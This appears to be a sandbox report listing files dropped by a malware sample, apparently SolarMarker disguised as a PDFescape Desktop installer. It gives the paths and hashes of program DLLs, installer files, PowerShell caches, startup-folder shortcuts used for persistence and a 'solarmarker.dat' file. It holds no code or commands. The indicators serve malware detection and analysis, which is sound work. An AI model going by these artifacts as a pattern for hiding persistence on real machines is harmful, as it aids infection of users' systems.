SHA25652163973b0cf8d46bcd1fb26c58f8ab2f7b31fb7e2b05ded2b59ae8d4e2332ad
SHA512d1240865fc5bfcd0c17205ce866be49b76ae31fccaaa724859822a6311e0e5bb6df2642b5659c1ad20414d79c6c9abbe74419ad4474fa71cbc4e8cab57d0c7cc
-
C:\Program Files\PDFescape Desktop\context-menu.dllMD5
2c9f26866787b200996d99ad160be2b2
SHA1fec80f5b4a6acf29f74a2bc8918298518a487597
SHA2564e3a2ed474ffdb02b4a177cd748cdb31b63f1f1fe3c32bf64cedfc06b6528a57
SHA5129ade4951f2297ad233bbd41103c8a686a6098cdb2f88ad63eec8742e3bacb85fc02357a58163139259274ed6f3a1299d07b7b7db43bf8eb539c1e0fec018d6dd
-
C:\Program Files\PDFescape Desktop\encoding-conversion.dllMD5
448a6de619faf0f403c897b142f619c5
SHA1e76953f8ee3c207b44d2e7c92eaabd5e6deee4d2
SHA25600a91d382e5e4a04071b208e4717c0f53e7d7146db1ab542f3fb3358f8aa4c51
SHA512f4e450e63a7105796fe78d90731c62804cf2ee5d2ac706525684b5c4eb20552126d1a2393acb5d5b4ee59ca4a4429aab9403510aa7947b2ef6f3eb36cbd3348d
-
C:\Program Files\PDFescape Desktop\libcurl.dllMD5
140cdda2f51d89dc194a8b8c3ab9e463
SHA1255180975a70d00d31d516ecc895e42fd18c24bf
SHA256a30c086bb16c702985df2193d1e52cfb15b978a679de014b449a95eb9a233c15
SHA5125065efa34b3289be247a5bc3f677afae7a86753fc37f816da70d54d1986b6dfe8cc73ad13900020a99fec7de71bd4d23e02bf73fab6be220db1c65482ca860a4
-
C:\Program Files\PDFescape Desktop\libssl-1_1-x64.dllMD5
62dc606e7f85f8f15a582a045e394d19
SHA1bad647ebb9207e2b20d464c6b420c84b971519d2
SHA2567a91d83167c864b5381667370b95fe6081290c61356c90def9a25cf7b3d9c411
SHA512d7e8c1e9abf695db2b1038c5231ccbc3c2cfd89171e4df3d7a13d8979c096772feace7dacbbb347a657e4e5519240813f8953b75c80259cd256245a9ef2f7e8f
-
C:\Program Files\PDFescape Desktop\pdfcore.dllMD5
c10d1adf13c2edde02e6adf49d1c900b
SHA14455fc9f229dedf4dd5622e6675c7a03ac8bd4d6
SHA2566e028640b313e136a28c77245700a5b2a604935fc55f4454888192b685081d44
SHA5120768d3372e652282d3cd0e5fa9e697949d682fa4e3c9ee8d70461588baa07243271129ec5b300c1893820fddaafda12867605c1c5858d57efa9e3fd65ca28fbe
-
C:\Program Files\PDFescape Desktop\pdfgraphics.dllMD5
1fc38631bf08eff07e8466f69ce90a46
SHA13973584e1371dfb26ae31cb4b555c972bd30f5a4
SHA25678c09e4d384f1b3df9e9e00798f5f048b41866af5e0c16b7e463e6bdd695ec89
SHA5125818d9f22cf865c12b08f684cb3cced4f55036f78df36d88cdb2530134f3db3170729b1212598ce6371c67ddd9eb887ff3e1fc551c258ee0ce3bd722529a63db
-
C:\Program Files\PDFescape Desktop\pdfview.dllMD5
40ca796430abed5d369f0781af26481e
SHA149abef703e2c9c70e691d8971505691402c2e745
SHA256e303c331da06258aa0f726ae95dc51f65bb3de88e8fa431a7542e867e208ad19
SHA51238a5be054afaddc28345860f23bb5824d8079b27d97862917a345460de7c131b8fbf41451248cc7efd60596cd5e0202160c9710992bac073b88b2b83074fa5b8
-
C:\Program Files\PDFescape Desktop\preview-handler.dllMD5
0a58eba4b339c0bb6f44a314ee06d7c7
SHA1136b337a2c80fce2e4c0732fe5c821d58aad7d40
SHA25632dbc446d09e062568989bace5cc19772e2dbeccec681dd8f38ef27cf5aab47a
SHA51218d664f0242412a2e0acece5a7a8de5f1be6816b80b5665192bab2d2868e682ef43cd275d8be276ef909663bd11233c972c5f7856a32663f3876ca5a8475ad85
-
C:\Program Files\PDFescape Desktop\root-service-provider.dllMD5
58c639f842629bf97596add29b0ad19c
SHA1059b152148a8fb92f9b8f119fa95608240ea2957
SHA25640b0061cec34d9e7ce84b01a3d30e9d7eb2bcd71b9110b06680767ec7f9da503
SHA512f304dd099df5e63ebea6f87a27b718bf7f1d7b995f77ea9cb0cbcbdc621d999eb5a1eca76b50a6e96a7e5e8d136e050fdcd04b9894743f254665537e35ad473a
-
C:\Program Files\PDFescape Desktop\thumbnail-handler.dllMD5
5c467cd8042003e71597dccb53a03bfb
SHA1134db7349cfc485ee5f32b9583210843e02acdda
SHA2562f6c64fe4b3c69d4f2235a461d74497e37c0eb3fb2432191370c2430848d5c85
SHA512b1782bd052e98cfd026067992180764965fcfec3c9b840512d522f0ed2278920616ac292d6332b9be0b5829c33bcabc4409bc0fceafe17290b1b13cc3a67dd99
-
C:\Program Files\PDFescape Desktop\ws.exeMD5
c86fef0f4c86065fda9368fe5a1043d0
SHA19c858857549675608c933b980d2f74c0ffaaa769
SHA256f88a861823f995c48ddb7afe8f4be90a5d1ea5deff3df0b0c152fa0e5c2f1b65
SHA5124674d73eee0741a8faf992e55214a0471702031d6fc922ee8e141750f385169be773d2610f608ed513764359fe1c1f8ed9d2602ff34b346e88bcaf321015b812
-
C:\Program Files\PDFescape Desktop\ws.exeMD5
c86fef0f4c86065fda9368fe5a1043d0
SHA19c858857549675608c933b980d2f74c0ffaaa769
SHA256f88a861823f995c48ddb7afe8f4be90a5d1ea5deff3df0b0c152fa0e5c2f1b65
SHA5124674d73eee0741a8faf992e55214a0471702031d6fc922ee8e141750f385169be773d2610f608ed513764359fe1c1f8ed9d2602ff34b346e88bcaf321015b812
-
C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exeMD5
87d28b3d2df1cab3711bf8d3b5b520c2
SHA11987a4bf2a37f6538c701461357a52b0bce1b980
SHA25688472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977
SHA51219226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4
-
C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exeMD5
87d28b3d2df1cab3711bf8d3b5b520c2
SHA11987a4bf2a37f6538c701461357a52b0bce1b980
SHA25688472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977
SHA51219226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4
-
C:\ProgramData\PDFescape Desktop\Installation\Statistics.dllMD5
e5a591c125fdf21381cf543ed7706c66
SHA10baad9f119616ce5d0d39d4cdc9c884c1002a24e
SHA25615b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6
SHA51220e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35
-
C:\ProgramData\PDFescape Desktop\Installation\pdfescape-desktop-startup-4.0.24.4617-x64.msiMD5
692a85c10d2e69d290a14aef95aae86f
SHA1381b06c12ac1fdcb1aaef79eb376b1f8d8f1c0e1
SHA25665f598aef6b4ff4cdd5efe63ad7d91f5014c53c5afbfc20e215e7427cc84a84d
SHA51238a67af0d1f593680e3da8e920ce9bf0e831168aebf4be2fc0fca34835d43e809103316b3cdaf71156aeea72139e0285eecefa6d391c4af2b9ea55745ec0d933
-
C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16aMD5
f49af433f9076c15cab2d858be35b939
SHA119fb76407184356e82560714f225a323ec19abc9
SHA256c9a510a5ea2d8575aa2f33691de5bae9c6086a5ced125a8ca1d6cb41463a5154
SHA51289163a3cd141906d559711a31a42e0153715eb54c9f5ec25395f34ab338270d98723e0e4bbad57a34440a49886194e58beb0048cd7c4cf9e432ffbaab52fe40c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\42B9A473B4DAF01285A36B4D3C7B1662_178C086B699FD6C56B804AF3EF759CB5MD5
9c3924724e332a4fcd197e1ef08862db
SHA1fc1f16f45a7ae8907d4e22aed7285fed2bf63d65
SHA256138473f3540469ed0993588cc2c9c6772c90bb1b087f1e8710b26d26666873de
SHA51278675e62bbb382733633feeea104e2f4920abb1485637881cd1d7887aff5e3b006ab9221be703e8a35d31d21d9351213ce57c9a74e9ef95893e7c8f51569e1a8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\66AE3BFDF94A732B262342AD2154B86E_ACB5A342F7DC5D176FB6290AA1E0F299MD5
3a988bae257d280c4de52b1f0cfdcd11
SHA1e33a9b3005c5f186d96380fec6363eb8c6b1aca2
SHA256436c4b5ad41c6d6ed8284be6d68c207bdea9798d20c47547fd3ea42b1c55d851
SHA512c808ed8d35205f491c5d6ca7fd2d6ab2bb8ae218b7300a4e3638c726fd66bde7591929375d2646e88c2acc3cc4c5d5624e5566438e05be98e417568ec98d2f04
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\42B9A473B4DAF01285A36B4D3C7B1662_178C086B699FD6C56B804AF3EF759CB5MD5
8156dd056c069e7884d163cfc0cafbcd
SHA15ecc13aa74626142f75248ad7bcf44ce27ed12b7
SHA256be7613120234c406aba91cbe0e955301b7561b181b61fcf71da020ed9590ea15
SHA5128fa1c69b51a126025d8841bd3c9a6352d7477cad54a6a947928a0fc11b0e84b7e9aa198f6b3d85e69d58593db7bc77a9ad5f7b26c95809b942c4894290f7f607
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\66AE3BFDF94A732B262342AD2154B86E_ACB5A342F7DC5D176FB6290AA1E0F299MD5
797f1aa1e2cccbd321ec0bd2ada0f61c
SHA1cad399cc371ad6a828d1ff8a26738a7c54ac759b
SHA256092c6d6d78a3f7806c9b7a25ee07257e410fd36b7e659d32926ea96773dd40a0
SHA5120c680bf5c1d70ee28e33fcc6066d83bf2997dc18e1f5925a3d2dfaa76446d60d5570f623e7e6978a5da0e7590f24bd25ade211d83c6947cb9c1a9de30d73486a
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
e71a0a7e48b10bde0a9c54387762f33e
SHA1fed75947f1163b00096e24a46e67d9c21e7eeebd
SHA25683d7be67d0eb544d655cc8e8eb687c26f772d6a40ebf8394e5c12b248976a2de
SHA512394c25daef6143de894505189b1edcdffb82fd6ab9de1c9e43865fb790803ff5c384debfe16236d4a9d95a78d3eea548d3cef332ed5a6881ac9c50d252c3c34a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
d574cec60e7a2c741d228106f7200e9d
SHA1f4e5d54789b13753635b273569e5416520c07f2d
SHA256088fa9def280fd2d923cb3f1fa4956b37975e5ef8019e37acfd3b3074879a758
SHA51254486c94df4932de9e2e2ccfe163e91a21b0ec876c3175461625e0365142fa8b841830ceb023863ed695efe267bdf51c9c959bc6adb32bfea4c1ba4ed389df5f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
661c4f95d8261708570b0acae10bd8d1
SHA139e88a6cbe6e777a5a3567271cfa524e5888b4e4
SHA2569fc501b77e38d7dcb0e95e4836083ac610fc499d4c5cd15be691c8c909705315
SHA512cca35a29537f9d7f5f954e76bbfa17098a349f465c3d4386ca3f7cd45b9f45e7c4f19a34c7529ba4950cacbfc0f7d559d174257bd2e8b81dab68db5e571872ce
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
9fa87989ec5f82cf763173fd8f1c0ccc
SHA15d03b7c43986d81e33fb19a8e597adb81732a49b
SHA25601393d58d1ca9e445c9340dabdc64323ee0decb15dd17e279c70ff844e11923f
SHA512cf29e1af67daeea63bfa29b133ca6121fdef454a75d75c04fe244fc0f8d4a41ad87d87c1c04301425befd9032211de7a128a17332efe1edafacbc424c7447049
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
a58904757f24439a0f3fc17b2e0682fc
SHA1b3f136b6fd45153fefd5997f7995cd68e6a96950
SHA25602596a9e52f908335d583a64465a5feba0dccbaf52957235df4af5bc22cf7a2f
SHA5127c5e15bacda6bfdbe375d1b1ab79481af5909f26b10f8975835fef3b4c67ac4ceec19b54a35413fbe5061522b62069240969cd685a6eabced9e41184721afc9a
-
C:\Users\Admin\AppData\Local\Temp\is-6P3E1.tmp\PDFescape_Desktop_Installer.exeMD5
87d28b3d2df1cab3711bf8d3b5b520c2
SHA11987a4bf2a37f6538c701461357a52b0bce1b980
SHA25688472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977
SHA51219226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4
-
C:\Users\Admin\AppData\Local\Temp\is-6P3E1.tmp\PDFescape_Desktop_Installer.exeMD5
87d28b3d2df1cab3711bf8d3b5b520c2
SHA11987a4bf2a37f6538c701461357a52b0bce1b980
SHA25688472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977
SHA51219226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4
-
C:\Users\Admin\AppData\Local\Temp\is-8E9RG.tmp\Choir-Director-Evaluation-Form.tmpMD5
0dc8e93706ff1b10cd6d60ab0ec15d88
SHA19e9c66127ba35ca4ee66fb3fa8820a683d4c943e
SHA2563b79aab07b9461a9d4f3c579555ee024888abcda4f5cc23eac5236a56bf740c7
SHA5120dbbd64f27055997279e36254ba2515b3672b41ef037777fd7490c0d0fa22f791934b483d281a33e542d9f5ee48bac73f2817e1dd93b0e3484c4c5653c8dbf66
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
ec6aacf8cdc4846f674c4593b56e1e33
SHA1ee3d2c75f644c0b9b4f941875f0402a6e6a7ae5c
SHA2560e4bc7f859f8d682160955dfcb207235f18f739901efa31e425ac906dfa4586f
SHA512c17bc43d909ae893525e46560f0ecc5a435ad1cf0ed0b0f13bc7bb86cfd7003835686f885429ae3b88104b4055a7fef5faa431ec0e0137fc8afe68a87802f51b
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
b8f9f50aa7c12c48518b8d1e8aacf56f
SHA17adc92800f88ceaa3cbef0749248e0ada606c130
SHA2562ae0ba74c7833ebc12122dd079b3dc661226a6b53cde474892d375b95ec1e853
SHA51204e303d27f20333fec1e69c407d8d38d3cf33bd29ccc623e0683f4ad9ba74ab6154420a24af8adcfe40e85e98d237e7cba722caae2013b72b21e71aa7717c0bc
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
0bea821aeb5410296c1976e8e266a7fb
SHA166f5485a9d16f822b28fee98be8c71d9537b8ed3
SHA2568a033e39e822568e0c9ea1b65a5d79ebb8a2c228194478058b22f856e25f1f67
SHA512ef46fb78ea259a232c870707597f9991ea3d67f6afaca319439edcba2f42261641a951d995638ed8346ef4774750a0cf079eb05d85599f02a3af6141b231879b
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
c26e655bbdd4da13b63e49e01f8bd0d7
SHA1c9cd9f96c3d1027f9a0879e04b375b32e447398c
SHA25627cabe1fa56a15d392f9fd1a75db570f390f78d0680499610b166843c8f83ea6
SHA51247bcb36fbd7b9641537ce871b453f42e5d6176f1d25a36805761662ca41e52f5dfbe62cf5a9535beb331b94e599af7d9b27a0f311e01d1f5704c45a8df70a3d8
-
C:\Users\Admin\appdata\roaming\solarmarker.datMD5
a6dd121c4c4e93ed991c95b0f450628a
SHA1194aa71717b94c1ecdd64b6c2b6994cbb2cf9796
SHA256c99bd4d14b03f358e78de770e96d4ac2a7be0915098960ab07aa43e88939d757
SHA512c10b2cfbbea8f8f1499f053941ecc62e03876a183af1b4ea1ce6e77506e80c41f76150e3aa12f04c69e32da98dc7569d81be4053efc1dbba2bf914c5e395d5da
-
\??\Volume{266d1ca4-0000-0000-0000-500600000000}\System Volume Information\SPP\OnlineMetadataCache\{bf938e5a-d670-4151-8193-6e039d31991d}_OnDiskSnapshotPropMD5
6d3c16b555d708514a21b5c8688450f5
SHA142016db97953aac171647718bd32ad2b6786f9b3
SHA2568cac0644984ec9b7f859d36fb58b0cbfd3ce6a3fafb709463e0dfbd34e481215
SHA5124422018144118e6d9b38b3301c6d8e97414b12e1630218068f101ba725a3711e66920efbd1fea47b5899d7b9ed07db26168569b04a8225468aa9215cc14a806c
-
\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dllMD5
a733c1f89219252497e94cbc66272478
SHA1f5f9be9a2345f6dc0414c3b62b4087faa32ce351
SHA256557bb1a545eac9c352dbbe15fbf383d29c6b2640b8cf74e49fefcdee97270547
SHA512875b4958cadbd8901f4fcb6c5c12f24e2112dbd287975134c6f83573d6ce679be0058dc259ab1db31a64dc48470622c80e75555e43a240e63854df859b65e0bd
-
\Program Files\PDFescape Desktop\atom.dllMD5
9148f07e6dedce3e8e6a642fba0402d8
SHA12e403f6b65bf4519d0883ebb0025d77130105a1c
SHA25635bd82d881759b2aa8ef6dc6e26d0943a19593b2192d207b4440c6e1a29ba05a
SHA5128f7ab028af2b782df35bf9940a8f367ac49f015d8302242d553e9437882b1fb76ebc91f3dfe2faadd2cde07af260e8ad140e3a59f0f44c05188ebf2bcfe016cb
-
\Program Files\PDFescape Desktop\brand.dllMD5
594a3e3adcf139e7b20eddd1f16131d3
SHA17700c89b10e779fc6db72b42be0a81fe89378f9a
SHA25652163973b0cf8d46bcd1fb26c58f8ab2f7b31fb7e2b05ded2b59ae8d4e2332ad
SHA512d1240865fc5bfcd0c17205ce866be49b76ae31fccaaa724859822a6311e0e5bb6df2642b5659c1ad20414d79c6c9abbe74419ad4474fa71cbc4e8cab57d0c7cc
-
\Program Files\PDFescape Desktop\context-menu.dllMD5
2c9f26866787b200996d99ad160be2b2
SHA1fec80f5b4a6acf29f74a2bc8918298518a487597
SHA2564e3a2ed474ffdb02b4a177cd748cdb31b63f1f1fe3c32bf64cedfc06b6528a57
SHA5129ade4951f2297ad233bbd41103c8a686a6098cdb2f88ad63eec8742e3bacb85fc02357a58163139259274ed6f3a1299d07b7b7db43bf8eb539c1e0fec018d6dd
-
\Program Files\PDFescape Desktop\encoding-conversion.dllMD5
448a6de619faf0f403c897b142f619c5
SHA1e76953f8ee3c207b44d2e7c92eaabd5e6deee4d2
SHA25600a91d382e5e4a04071b208e4717c0f53e7d7146db1ab542f3fb3358f8aa4c51
SHA512f4e450e63a7105796fe78d90731c62804cf2ee5d2ac706525684b5c4eb20552126d1a2393acb5d5b4ee59ca4a4429aab9403510aa7947b2ef6f3eb36cbd3348d
-
\Program Files\PDFescape Desktop\libcurl.dllMD5
140cdda2f51d89dc194a8b8c3ab9e463
SHA1255180975a70d00d31d516ecc895e42fd18c24bf
SHA256a30c086bb16c702985df2193d1e52cfb15b978a679de014b449a95eb9a233c15
SHA5125065efa34b3289be247a5bc3f677afae7a86753fc37f816da70d54d1986b6dfe8cc73ad13900020a99fec7de71bd4d23e02bf73fab6be220db1c65482ca860a4
-
\Program Files\PDFescape Desktop\pdfcore.dllMD5
c10d1adf13c2edde02e6adf49d1c900b
SHA14455fc9f229dedf4dd5622e6675c7a03ac8bd4d6
SHA2566e028640b313e136a28c77245700a5b2a604935fc55f4454888192b685081d44
SHA5120768d3372e652282d3cd0e5fa9e697949d682fa4e3c9ee8d70461588baa07243271129ec5b300c1893820fddaafda12867605c1c5858d57efa9e3fd65ca28fbe
-
\Program Files\PDFescape Desktop\pdfcore.dllMD5
c10d1adf13c2edde02e6adf49d1c900b
SHA14455fc9f229dedf4dd5622e6675c7a03ac8bd4d6
SHA2566e028640b313e136a28c77245700a5b2a604935fc55f4454888192b685081d44
SHA5120768d3372e652282d3cd0e5fa9e697949d682fa4e3c9ee8d70461588baa07243271129ec5b300c1893820fddaafda12867605c1c5858d57efa9e3fd65ca28fbe
-
\Program Files\PDFescape Desktop\pdfgraphics.dllMD5
1fc38631bf08eff07e8466f69ce90a46
SHA13973584e1371dfb26ae31cb4b555c972bd30f5a4
SHA25678c09e4d384f1b3df9e9e00798f5f048b41866af5e0c16b7e463e6bdd695ec89
SHA5125818d9f22cf865c12b08f684cb3cced4f55036f78df36d88cdb2530134f3db3170729b1212598ce6371c67ddd9eb887ff3e1fc551c258ee0ce3bd722529a63db
-
\Program Files\PDFescape Desktop\pdfview.dllMD5
40ca796430abed5d369f0781af26481e
SHA149abef703e2c9c70e691d8971505691402c2e745
SHA256e303c331da06258aa0f726ae95dc51f65bb3de88e8fa431a7542e867e208ad19
SHA51238a5be054afaddc28345860f23bb5824d8079b27d97862917a345460de7c131b8fbf41451248cc7efd60596cd5e0202160c9710992bac073b88b2b83074fa5b8
-
\Program Files\PDFescape Desktop\preview-handler.dllMD5
0a58eba4b339c0bb6f44a314ee06d7c7
SHA1136b337a2c80fce2e4c0732fe5c821d58aad7d40
SHA25632dbc446d09e062568989bace5cc19772e2dbeccec681dd8f38ef27cf5aab47a
SHA51218d664f0242412a2e0acece5a7a8de5f1be6816b80b5665192bab2d2868e682ef43cd275d8be276ef909663bd11233c972c5f7856a32663f3876ca5a8475ad85
-
\Program Files\PDFescape Desktop\root-service-provider.dllMD5
58c639f842629bf97596add29b0ad19c
SHA1059b152148a8fb92f9b8f119fa95608240ea2957
SHA25640b0061cec34d9e7ce84b01a3d30e9d7eb2bcd71b9110b06680767ec7f9da503
SHA512f304dd099df5e63ebea6f87a27b718bf7f1d7b995f77ea9cb0cbcbdc621d999eb5a1eca76b50a6e96a7e5e8d136e050fdcd04b9894743f254665537e35ad473a
-
\Program Files\PDFescape Desktop\thumbnail-handler.dllMD5
5c467cd8042003e71597dccb53a03bfb
SHA1134db7349cfc485ee5f32b9583210843e02acdda
SHA2562f6c64fe4b3c69d4f2235a461d74497e37c0eb3fb2432191370c2430848d5c85
SHA512b1782bd052e98cfd026067992180764965fcfec3c9b840512d522f0ed2278920616ac292d6332b9be0b5829c33bcabc4409bc0fceafe17290b1b13cc3a67dd99
-
\ProgramData\PDFescape Desktop\Installation\Statistics.dllMD5
e5a591c125fdf21381cf543ed7706c66
SHA10baad9f119616ce5d0d39d4cdc9c884c1002a24e
SHA25615b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6
SHA51220e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35
-
\ProgramData\PDFescape Desktop\Installation\Statistics.dllMD5
e5a591c125fdf21381cf543ed7706c66
SHA10baad9f119616ce5d0d39d4cdc9c884c1002a24e
SHA25615b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6
SHA51220e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35
-
\ProgramData\PDFescape Desktop\Installation\Statistics.dllMD5
e5a591c125fdf21381cf543ed7706c66
SHA10baad9f119616ce5d0d39d4cdc9c884c1002a24e
SHA25615b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6
SHA51220e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35
-
\Users\Admin\AppData\Local\Temp\is-6P3E1.tmp\_isetup\_isdecmp.dllMD5
c6ae924ad02500284f7e4efa11fa7cfc
SHA12a7770b473b0a7dc9a331d017297ff5af400fed8
SHA25631d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae
-
\Users\Admin\AppData\Local\Temp\is-6P3E1.tmp\_isetup\_isdecmp.dllMD5
c6ae924ad02500284f7e4efa11fa7cfc
SHA12a7770b473b0a7dc9a331d017297ff5af400fed8
SHA25631d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae
-
memory/1008-125-0x0000000000000000-mapping.dmp
-
memory/1104-299-0x0000000000000000-mapping.dmp
-
memory/1752-206-0x0000000006A62000-0x0000000006A63000-memory.dmpFilesize
4KB
-
memory/1752-165-0x0000000006A60000-0x0000000006A61000-memory.dmpFilesize
4KB
-
memory/1752-150-0x0000000006A00000-0x0000000006A01000-memory.dmpFilesize
4KB
-
memory/1752-133-0x0000000000000000-mapping.dmp
-
